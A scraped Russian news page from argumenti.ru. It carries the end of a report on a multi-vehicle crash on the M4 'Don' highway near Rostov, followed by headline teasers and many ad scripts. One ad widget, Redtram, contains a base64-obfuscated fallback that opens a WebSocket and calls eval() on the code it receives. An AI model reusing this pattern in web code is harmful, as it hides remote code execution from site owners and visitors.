<p>В сообщении МЧС говорится: "В 13:30 в ОДС ЦУКС МЧС России по РО поступила информация о ДТП на трассе М4-ДОН 1070 км. Аксайский район.</p>
<p>Для ликвидации последствий ДТП от МЧС привлекались 13 человек личного состава, 4 ед. техники".</p>
<p>УГИБДД ГУ МВД России по Ростовской области призывает водителей не оставлять транспорт на проезжей части улиц города, чтобы не затруднять работу снегоуборочной техники, а также соблюдать требования правил остановки и стоянки транспортных средств.</p></div>

    					
    					<div style="font-size: 0;">
<div style="display: inline-block; width: 50%; vertical-align: top;">
<!--AdFox START-->
<!--MarTi-->
<!--Площадка: argumenti.ru / * / *-->
<!--Тип баннера: Кубики-->
<!--Расположение: 2-->
<div id="adfox_mid1"></div>
<script>
    window.Ya.adfoxCode.create({
        ownerId: 254948,
        containerId: 'adfox_mid1',
        params: {
            pp: 'nok',
            ps: 'dadz',
            p2: 'ganf',
            puid1: ''
        }
    });
</script></div>
<div style="display: inline-block; width: 50%; vertical-align: top;">
<!--AdFox START-->
<!--MarTi-->
<!--Площадка: argumenti.ru / * / *-->
<!--Тип баннера: Кубики-->
<!--Расположение: 2-->
<div id="adfox_mid2"></div>
<script>
    window.Ya.adfoxCode.create({
        ownerId: 254948,
        containerId: 'adfox_mid2',
        params: {
            pp: 'nok',
            ps: 'dadz',
            p2: 'ganf',
            puid1: ''
        }
    });
</script></div>
</div>
						
							<p class="ai_youtube">
			<a href="http://argumenti.ru/ad_informer/click/81102?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow">Воспитатель тигров Михаил Зарецкий (Документальный фильм)</a>
	</p>
						
						<div class="paywall_box">
    <div> 
        <h3>Понравилась публикация? Поддержите издание!</h3>
        <a class="button" href="http://argumenti.ru/robomail/688">5 руб. [ Сказать спасибо ]</a>
        <a class="button podpiska_button" style="float: left;" href="http://argumenti.ru/robomail/712" role="button">25 руб. [ Получить свежий номер на почту ]</a>
        <a class="button podpiska_button" style="float: right;" href="http://argumenti.ru/robomail/486" role="button">490 руб. [ Получить годовую подписку ]</a>      
        <p class="snoska">*Получай яркий, цветной оригинал газеты в формате PDF на свой электронный адрес</p>
        
        <h4 style="padding-top: 9px;">Оставайтесь с нами. <span style="text-decoration: underline;">Добавьте нас в "Мои источники" в Яндекс Новостях</span> и мы позаботимся о том, чтобы вы читали только интересный и проверенный контент</h4>          
        <a class="button" style="background: #343a40;margin-top: 5px;" href="https://goo.gl/3NxAWJ" target="_blank">Добавить в «Мои Источники» в Яндекс Новостях</a>


        <h4>Обсудить наши публикации можно здесь:</h4>
		
		<div class="paywall_socnets">
			<a href="https://vk.com/club14409962">
				<i class="fa fa-vk" aria-hidden="true"></i>
			</a>
			<a href="https://ok.ru/argumenti">
				<i class="fa fa-odnoklassniki" aria-hidden="true"></i>
			</a>
			<a href="https://www.facebook.com/argumentinedeli">
				<i class="fa fa-facebook" aria-hidden="true"></i>
			</a>
			<a href="https://twitter.com/argumenti">
				<i class="fa fa-twitter" aria-hidden="true"></i>
			</a>
			<a href="https://www.instagram.com/argumenti.ru/">
				<i class="fa fa-instagram" aria-hidden="true"></i>
			</a>
		</div>

    </div>
</div>
								
						

				</div>
	
			</article>

												<div id="initials">ИЧ</div>
					

			<ul id="tags"><li>Теги:&nbsp;</li>
									<li>				<a href="http://argumenti.ru/search/%23%D0%B4%D1%82%D0%BF">дтп</a>
			</li>
									<li>,&nbsp;				<a href="http://argumenti.ru/search/%23%D1%80%D0%BE%D1%81%D1%82%D0%BE%D0%B2%D1%81%D0%BA%D0%B0%D1%8F%2B%D0%BE%D0%B1%D0%BB%D0%B0%D1%81%D1%82%D1%8C">ростовская область</a>
			</li>
									<li>,&nbsp;				<a href="http://argumenti.ru/search/%23"></a>
			</li>
					</ul>
	

			
		

	    
<!--<p id="comment_info">Обсудить наши публикации можно на страничках «АН» в <a href="http://facebook.com/argumentinedeli" target="_blank" rel="nofollow">Facebook</a> и <a href="http://vk.com/club14409962" target="_blank" rel="nofollow">ВКонтакте</a></p>-->

<script type="text/javascript">(function() {
  if (window.pluso)if (typeof window.pluso.start == "function") return;
  if (window.ifpluso==undefined) { window.ifpluso = 1;
    var d = document, s = d.createElement('script'), g = 'getElementsByTagName';
    s.type = 'text/javascript'; s.charset='UTF-8'; s.async = true;
    s.src = ('https:' == window.location.protocol ? 'https' : 'http')  + '://share.pluso.ru/pluso-like.js';
    var h=d[g]('body')[0];
    h.appendChild(s);
  }})();</script>
<div class="pluso" data-background="none;" data-options="medium,square,line,horizontal,counter,sepcounter=1,theme=14" data-services="vkontakte,odnoklassniki,facebook,twitter,moimir"></div>
    
    
<p class="namerub"><span class="rem">//</span>Подписаться на рассылку эксклюзива от АН</p>
	<noindex>
		<iframe src="http://mailing.argumenti.ru/" style="width:97%; border: none;padding: 0px;">
	    	Ваш браузер не поддерживает плавающие фреймы!
		 </iframe>
	 </noindex>
    
        
    <div id="utCRoll"></div> 
                <script> 
                    (function (w, d, u) { 
                        w.utCRoll = { 
                            id: 2352, max_prerolls:1, 
                        onClose: function () { //действия по закрытию плеера  
                        } 
                        }; 
                        var s=d.createElement("script");s.type='text/javascript';s.charset="UTF-8";s.async=true;s.src=u;d.head.appendChild(s); 
                    }) 
                    (window, document, "https://ima.utraff.com/new/contentroll.js"); 
                </script>			<div class="mainrub">
		<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>
	



	<img src="http://argumenti.ru/images/preview/arhnews/c52f2784c1999d585eff6c1eedc0615e.jpg" alt="Визовый центр Испании в Москве возобновил  работу" />
	
<p class="maxititle"><a href="http://argumenti.ru/world/2018/11/592350">Визовый центр Испании в Москве возобновил  работу</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2018/11/592350">В Москве 13 ноября был закрыт визовый центр Испании.  Сообщение о возобновлении работы появилось на сайте центра. "Сообщаем вам, что визовый центр Испании возобновил свою работу 13 ноября в 15:00". 
</a></div>	</div>
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/313d1ade9fcdee734f305f6778b62bf8.jpg" alt="Бывший украинский подполковник сообщил подробности о подготовке терактов в Крыму" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2018/11/592249">Бывший украинский подполковник сообщил подробности о подготовке терактов в Крыму</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2018/11/592249">В СМИ утром появились подробности о подготовке терактов в 2016 году на территории Крыма. Соответствующие данные в рамках допроса предоставил украинский подполковник в отставке Георгий Абдиллаев.
</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/16f95b80006990d8adc3d6d629d3664e.jpg" alt="В ДНР поведали об отказе ВСУ выполнять план Киева по срыву выборов в Донбассе" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2018/11/592315">В ДНР поведали об отказе ВСУ выполнять план Киева по срыву выборов в Донбассе</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2018/11/592315">Вооруженные силы Украины саботировали план киевского политического и военного руководства по срыву выборов в самопровозглашенной ДНР. Соответствующее заявление на брифинге сделал Эдуард Басурин.</a></div>		</div>
	</div>
	
	<h2 class="namerub"><span class="rem">//</span>Новости СМИ2</h2>

<div id="unit_92578"><a href="http://smi2.ru/" >Новости СМИ2</a></div>
<script type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = '//smi2.ru/data/js/92578.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/8a789fc61114f200eab19ca40cbbc1de.jpeg" alt="Эрдоган: аудиозапись убийства Хашукджи шокировала сотрудников спецслужб" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2018/11/592264">Эрдоган: аудиозапись убийства Хашукджи шокировала сотрудников спецслужб</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2018/11/592264">Глава Турции Реджеп Тайип Эрдоган предоставил аудиозапись убийства журналиста Джамаля Хашукджи сотрудникам разведывательной службы Саудовской Аравии. Политик заявил, что их шокировал этот материал.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/auto">Авто</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/fc21265a051f71338c4df76e7c2c8789.jpg" alt="В России официально разрешили укладку асфальта в дождь и мороз" />
	

<p class="minititle"><a href="http://argumenti.ru/auto/2018/11/592333">В России официально разрешили укладку асфальта в дождь и мороз</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/auto/2018/11/592333">В Росавтодоре согласовали методические рекомендации, позволяющие при соблюдении всех технологических процессов проводить работы по прокладке и замене дорожного полотна в плохую погоду.</a></div>		</div>
	</div>

	<h2 class="namerub"><span class="rem">//</span>Новости ADWILE</h2>
<div id="smi_teaser_10213">
<center><a href="http://partner.adwile.com" rel="nofollow">Нативная реклама ADWILE</a></center>
</div>
<script type="text/JavaScript" encoding="utf8">
 (function() {
 var sm = document.createElement("script");
 sm.type = "text/javascript";
 sm.async = true;
 sm.src = "//jsn.24smi.net/4/c/10213.js";
 var s = document.getElementsByTagName("script")[0];
 s.parentNode.insertBefore(sm, s);})();
</script>
	<h2 class="namerub"><span class="rem">//</span>Новости МирТесен</h2>
<div id="unit_83639"><a href="http://advert.mirtesen.ru/" rel="nofollow">Новости advert.mirtesen.ru</a></div>
<script type="text/javascript" charset="utf-8">
(function() {
var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
sc.src = '//js.advert.mirtesen.ru/data/js/83639.js'; sc.charset = 'utf-8';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
}());
</script>

<br><br>	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/f9387a123435db43bd896a76644cb3e8.jpg" alt="Турчак: ЕР отстояла благоустройство небольших населенных пунктов в бюджете-2019" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2018/11/592292">Турчак: ЕР отстояла благоустройство небольших населенных пунктов в бюджете-2019</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2018/11/592292">«Единая Россия» отстояла действующую модель использования регионами федеральных средств на ремонт дворовых территорий, а также на благоустройство населенных пунктов с населением более одной тысячи человек.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/science">Наука</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/5a7ddac6d8609b9393d67fcaae7e6001.jpg" alt="Ученые назвали признак идеального мужчины" />
	

<p class="minititle"><a href="http://argumenti.ru/science/2018/11/592343">Ученые назвали признак идеального мужчины</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/science/2018/11/592343">Исследователи изучили и систематизировали обычай средневековых мужчин выбирать себе жену по ее вкусовым пристрастиям к определенным фруктам и ягодам, и обнаружили любопытную взаимосвязь.</a></div>		</div>
	</div>
	<!--AdFox START-->
<!--argumentiru-->
<!--Площадка: Аргументы Недели / * / *-->
<!--Тип баннера: Аргументы Недели (центральная колонка)-->
<!--Расположение: <середина страницы>-->
<div id="adfox_151990176341747532"></div>
<script>
    window.Ya.adfoxCode.create({
        ownerId: 264297,
        containerId: 'adfox_151990176341747532',
        params: {
            pp: 'h',
            ps: 'cquo',
            p2: 'fvjc'
        }
    });
</script>
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/rassledovanie">Расследования</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/7d155e355a77d1aec9129164d9c9df4f.JPG" alt="Следственный комитет возобновил расследование убийства Талькова" />
	

<p class="minititle"><a href="http://argumenti.ru/rassledovanie/2018/11/592322">Следственный комитет возобновил расследование убийства Талькова</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/rassledovanie/2018/11/592322">Следователи возобновили расследование загадочного убийства популярного певца и музыканта Игоря Талькова. Об этом сообщается на сайте петербургского главка Следственного комитета.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/showbiz">Шоу-бизнес</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/e10cf94ae6ee17aa78d03911b4131998.jpg" alt="Анатолий Белый благодарен за все, чему его научила Марина Голуб" />
	

<p class="minititle"><a href="http://argumenti.ru/showbiz/2018/11/592336">Анатолий Белый благодарен за все, чему его научила Марина Голуб</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/showbiz/2018/11/592336">Актриса Марина Голуб и актер Анатолий Белый. Голуб была старше Белого на 15 лет. Они были счастливы в браке 12 лет. Во время жизни с Мариной карьера Анатолия пошла по нарастающей.</a></div>		</div>
	</div>

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/politics">Политика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/de40ebc30caaab513b5dc38888928903.jpg" alt="Пушков высказался по возможному отказу участия России в Давосском форуме" />
	

<p class="minititle"><a href="http://argumenti.ru/politics/2018/11/592349">Пушков высказался по возможному отказу участия России в Давосском форуме</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/politics/2018/11/592349">Председатель Комиссии Совета Федерации по информационной политике высказался по поводу возможного участия России в Давосском экономическом форуме. Форум перестанет быть всемирным, если от участия откажется Россия.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/1401561960c3a22bd152522484742fc6.jpg" alt="Лукашенко обратился к чиновникам: &quot;Мужики, лучше беднее, но на свободе&quot;" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2018/11/592348">Лукашенко обратился к чиновникам: &quot;Мужики, лучше беднее, но на свободе&quot;</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2018/11/592348">Президент Беларуси Александр Лукашенко считает коррупцию недопустимым явлением. По его словам, он никогда не будет защищать тех, кто замешан в каких-либо незаконных махинациях. </a></div>		</div>
	</div>

	
<p class="namerub"><span class="rem">//</span>Новости партнеров</p>
<div id="smi_teaser_3101">
    <center><a href="http://24smi.info" rel="nofollow">Агрегатор новостей 24СМИ</a></center>
</div>
<script type="text/JavaScript" encoding="utf8">
                (function() {
                var sm = document.createElement("script");
                sm.type = "text/javascript";
                sm.async = true;
                sm.src = "//jsn.24smi.net/6/2/3101.js";
                var s = document.getElementsByTagName("script")[0];
                s.parentNode.insertBefore(sm, s);})();</script>
            
<hr>
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/000a12721cdd6482ee3eac6dcf0c9cac.jpeg" alt="Массовое ДТП произошло  на трассе М4 &quot;Дон&quot; под Ростовом" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2018/11/592347">Массовое ДТП произошло  на трассе М4 &quot;Дон&quot; под Ростовом</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2018/11/592347">Массовое дорожно-транспортное происшествие произошло во вторник, 13 ноября, в Ростовской области. На 1070-м километре трассы М4 "Дон" столкнулись 13 автомобилей. В результате ДТП один человек погиб.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/showbiz">Шоу-бизнес</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/f8463a0ff9fe7f6d0b4bf4353d54f6f3.jpg" alt="Андрей Разин показал редкое фото Пугачевой и Моисеева из своего архива" />
	

<p class="minititle"><a href="http://argumenti.ru/showbiz/2018/11/592346">Андрей Разин показал редкое фото Пугачевой и Моисеева из своего архива</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/showbiz/2018/11/592346">Легенда российского шоу-бизнеса, создатель группы "Ласковай май" Андрей Разин опубликовал редкое фото Аллы Пугачевой и Бориса Моисеева, хранящееся в его архиве. На фото Алла Пугачева и трио "Экспрессия".
</a></div>		</div>
	</div>

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/fb72cbdc899efc41f0619664a5ee9aae.jpg" alt="На Донбассе рассказали что произойдет в ДНР после победы Пушилина" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2018/11/592345">На Донбассе рассказали что произойдет в ДНР после победы Пушилина</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2018/11/592345">Война уйдет с повестки дня. Основной упор будет сделан на восстановлении республики. Об этом корреспонденту АН рассказал инсайдер внутренней политики официального Донецка.

</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/sport">Спорт</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/5d58be034c38735dbad465bb4c2d7592.JPG" alt="Опубликован топ-10 самых высокооплачиваемых футболистов мира" />
	

<p class="minititle"><a href="http://argumenti.ru/sport/2018/11/592344">Опубликован топ-10 самых высокооплачиваемых футболистов мира</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/sport/2018/11/592344">Самыми высокооплачиваемыми футболистами в мире оказались нападающий «Барселоны» Лионель Месси (40 миллионов евро в год),  форвард туринского «Ювентуса» Криштиану Роналду (31 миллионом евро).</a></div>		</div>
	</div>

	<script async type='text/javascript' src='//s.luxupcdnc.com/t/common_402.js'></script>
<script class='__lxGc__' type='text/javascript'>
((__lxGc__=window.__lxGc__||{'s':{},'b':0})['s']['_183738']=__lxGc__['s']['_183738']||{'b':{}})['b']['_621776']={'i':__lxGc__.b++};
</script>

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/economics">Экономика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/21f48ed8c8940b66dd1d72057c42e34d.jpg" alt="Аналитики дали прогноз по курсу доллара к  Новогодним праздникам" />
	

<p class="minititle"><a href="http://argumenti.ru/economics/2018/11/592342">Аналитики дали прогноз по курсу доллара к  Новогодним праздникам</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/economics/2018/11/592342">Курс доллара к концу 2018 года может превысить отметку 70 рублей. Обвал рубля под Новогодние праздники прогнозируют банковские аналитики. В середине октября доллар стоил порядка 65,5 рублей, сейчас - 67,7 рублей.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/a57f8bc415c5bb4755bd8a45255116ee.jpg" alt="Женщину, убившую подругу за отказ покормить котенка, осудили на 9 лет колонии" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2018/11/592341">Женщину, убившую подругу за отказ покормить котенка, осудили на 9 лет колонии</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2018/11/592341">В Саратовской области суд города Энгельса приговорил к девяти годам лишения свободы женщину, осужденную за убийство подруги, которая отказалась покормить голодного котенка. </a></div>		</div>
	</div>

	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/02777a097ffb2f4b5f2d3cedf2289b1a.jpg" alt="Жители Новороссийска и  Геленджика остались без воды из-за аварии на водоводе" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2018/11/592340">Жители Новороссийска и  Геленджика остались без воды из-за аварии на водоводе</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2018/11/592340">В Новороссийск во вторник, 13 ноября, вечером из-за аварии на магистральном водоводе полностью 
прекращена подача воды. Полностью прекращена подача воды вГеленджике, Крымске и Крымском районе.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/sport">Спорт</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/217aeff44ccc18130d0fcb3ce472af2d.jpg" alt="Назван состав российской сборной на этапе Гран-при по фигурному катанию в Москве" />
	

<p class="minititle"><a href="http://argumenti.ru/sport/2018/11/592339">Назван состав российской сборной на этапе Гран-при по фигурному катанию в Москве</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/sport/2018/11/592339">Назван состав российской сборной на этапе Гран-при по фигурному катанию в Москве. Состав российской команды опубликован на официальном сайте Федерации фигурного катания на коньках.</a></div>		</div>
	</div>

    <h2 class="namerub"><span class="rem">//</span>Новости СМИ2</h2>
<div id="unit_91265"><a href="https://smi2.net/">Новости smi2.ru</a></div>
<script type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = '//smi2.ru/data/js/91265.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/5ead679379c4a1274e3e3ef5f5ca7edc.jpg" alt="&quot;Роскосмос&quot; представил облик космического аппарата с ядерной энергоустановкой" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2018/11/592338">&quot;Роскосмос&quot; представил облик космического аппарата с ядерной энергоустановкой</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2018/11/592338">Госкорпорация "Роскосмос" представила  концептуальный облик нового космического аппарата с ядерной энергоустановкой. Ролик опубликован на Facebook телестудии госкорпорации.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/unknown">Непознанное</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/b20be66e11ae7180e5b79c50449722e7.jpg" alt="В небе над Ирландией пилоты зафиксировали НЛО" />
	

<p class="minititle"><a href="http://argumenti.ru/unknown/2018/11/592337">В небе над Ирландией пилоты зафиксировали НЛО</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/unknown/2018/11/592337">Пилоты сразу нескольких авиакомпаний рассказали о неопознанных летающих объектах в небе над Ирландией. Запись переговоров о появлении НЛО были опубликованы в Сети, вызвав неоднозначную реакцию.</a></div>		</div>
	</div>


	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/politics">Политика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/ea6c0ebf25a6438410cf7ee9fe14f293.jpg" alt="Меркель одобрила идею общеевропейской армии" />
	

<p class="minititle"><a href="http://argumenti.ru/politics/2018/11/592335">Меркель одобрила идею общеевропейской армии</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/politics/2018/11/592335">Канцлер Германии Ангела Меркель, выступая во вторник с речью в Европарламенте в Страсбурге, заявила, что Евросоюзу следует работать в направлении создания единой армии сообщества.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/cfac1e5eb014f9d8a33cdb6c81fc3a68.jpg" alt="В Тбилиси задержан подозреваемый в убийстве следователя  Евгении Шишкиной" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2018/11/592334">В Тбилиси задержан подозреваемый в убийстве следователя  Евгении Шишкиной</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2018/11/592334">В Тбилиси задержан подозреваемый в убийстве подмосковного следователя Евгении Шишкиной 28-летнего уроженца Астрахани Ярослава Сумбаева. В ближайшее время задержанного Сумбаева передадут российским властям.</a></div>		</div>
	</div>

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/showbiz">Шоу-бизнес</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/8ed58b0d1f868bc4cd872002b4808dd7.jpg" alt="В сети обсуждают фигуру певицы Нюши: быстро в форму пришла, как будто не рожала" />
	

<p class="minititle"><a href="http://argumenti.ru/showbiz/2018/11/592332">В сети обсуждают фигуру певицы Нюши: быстро в форму пришла, как будто не рожала</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/showbiz/2018/11/592332">В сети обсуждают фигуру певицы Нюши (анны Шурочкиной), которая неделю назад впервые стала мамой.
Артистка родила дочку и уже гуляет с малышкой на улице. Нюша опубликовала фото с коляской.
</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/health">Здоровье</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/b23542ba473eeb8c986dd5d83ba1fefa.jpg" alt="Десять советов для нормализации давления без таблеток перечислили специалисты" />
	

<p class="minititle"><a href="http://argumenti.ru/health/2018/11/592321">Десять советов для нормализации давления без таблеток перечислили специалисты</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/health/2018/11/592321">Специалисты в области здравоохранения перечислили десять советов, следование которым позволяет снизить артериальное давление надолго и без лекарств. Соответствующая публикация появилась в блогосфере.</a></div>		</div>
	</div>	
    <h2 class="namerub"><span class="rem">//</span>Новости Redtram</h2>

<script id="r19412" type="text/javascript">
    (function() {
        var worker19412,
            tickerID = 19412,
            tag = document.getElementById('r'+ tickerID),
            id = (function(tickerID) {
                var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600;
                if ('btoa' in window)
                    return btoa('g4p_'+ tickerID +'_'+ now).replace(/[^a-zA-Z0-9]/, '');
                return 'g4p_'+ tickerID +'_'+ now;
            })(tickerID);
        
        var container = document.createElement('div');
            container.id = id;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.src = '//js-goods.redtram.com/0/19/ticker_19412.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9nNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKC95YW5kZXh8eWFicm93c2VyL2kudGVzdChuYXZpZ2F0b3IudXNlckFnZW50KSkgd3NzVXJsID0gIndzczovL2c0cC5ncnQwMS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker19412.postMessage(data);
                }

                worker19412 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker19412.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker19412.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/economics">Экономика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/d1b699f463eb6316e545bfdb232eaea8.jpg" alt="В Кремле оценили ситуацию с ценами на топливо в РФ" />
	

<p class="minititle"><a href="http://argumenti.ru/economics/2018/11/592328">В Кремле оценили ситуацию с ценами на топливо в РФ</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/economics/2018/11/592328">Пресс-секретарь президента России Дмитрий Песков рассказал журналистам, что в Кремле ждут реакции кабмина на опасения независимых АЗС, вызванные решением о заморозке цен на нефтепродукты.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




